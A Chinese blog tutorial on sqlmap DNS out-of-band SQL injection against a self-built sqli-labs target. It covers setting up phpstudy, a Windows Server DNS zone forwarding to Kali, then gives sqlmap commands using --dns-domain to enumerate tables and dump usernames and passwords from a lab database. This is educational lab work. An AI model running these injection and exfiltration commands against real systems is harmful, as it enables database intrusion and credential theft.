当前位置:网站首页>sqlmap结合dnslog快速注入
sqlmap结合dnslog快速注入
2022-08-10 23:35:00 【抱小猫】
如何使用sqlmap结合dnslog快速注入呢
首先我们需要三台虚拟机,一台Windows10作为客户端,Windows server2008作为服务器,还有一台kali。
第一步:先在Windows10上下载phpstudy小皮面板,然后后下载sqli-labs靶场,并将sqli-labs靶场文件放入WWW目录下
第二步:修改数据库配置文件,将数据库的my.ini中添加secure_file_priv="",方便后面读取文件
第三步:在Windows server 2008上搭建DNS服务器
单击角色-->添加角色-->点击服务器角色-->选中DNS服务器-->下一步-->安装
右键查看WIN-JGVPSZCQ80R的属性-->监视-->勾上两个测试类型-->确定
新建区域:右键点击新建-->下一步-->自定义一个区域名称-->下一步-->完成
新建主机ns1.ceshi.top,这样填上kali虚拟机的IP地址
再创建一个泛解析:
第四步:在Windows10上配置DNS服务器的IP
第五步:使用Windows10pingDNS中创建的域名,并在kali中查看
第六步:在Windows server2008中创建转发器
使用Windows10ping转发器的域名,并在kali中查看
第七步:sqlmap使用DNSlog外带注入
我们使用sqlmap找到数据库中的表名
sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D security --tables
根据users表名找表中的列
sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security" -t "users" --columns取出users表中的数据
sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security" -t "users" -C "username,password" --dump边栏推荐
猜你喜欢
随机推荐
vr虚拟仿真教学系统应用场景开发
矩阵的迹(详解)
HFCTF 2021 Internal System writeup
sklearn.datasets.make_circles
Redis - Use lua script to control the number of wrong passwords and lock the account
小程序平台工具如何选择和使用?
mysql数据库高级操作
vr工业操作培训模拟系统可以应用到哪些场景中
Talk预告 | 中国科学技术大学和微软亚洲研究院联合培养博士生冷燚冲:语音识别的快速纠错模型FastCorrect
有趣并发性能分享:线程池为什么设计成这样?
ROS实验笔记之——安装QPEP以及Intel-MKL
CSAPP lab1 DataLab
ROS Experimental Notes - Install QPEP and Intel-MKL
特殊类与类型转换
Pytorch面试题面经
Cache knowledge summary
XSLeaks side channel attack (unfinished)
How to quickly grasp industry opportunities and introduce new ones more efficiently is an important proposition
Microsoft: Into Focus with Scott Guthrie Scott Hanselman Rajesh Jha and Kevin Scott | KEY11
[C language] Detailed explanation of data storage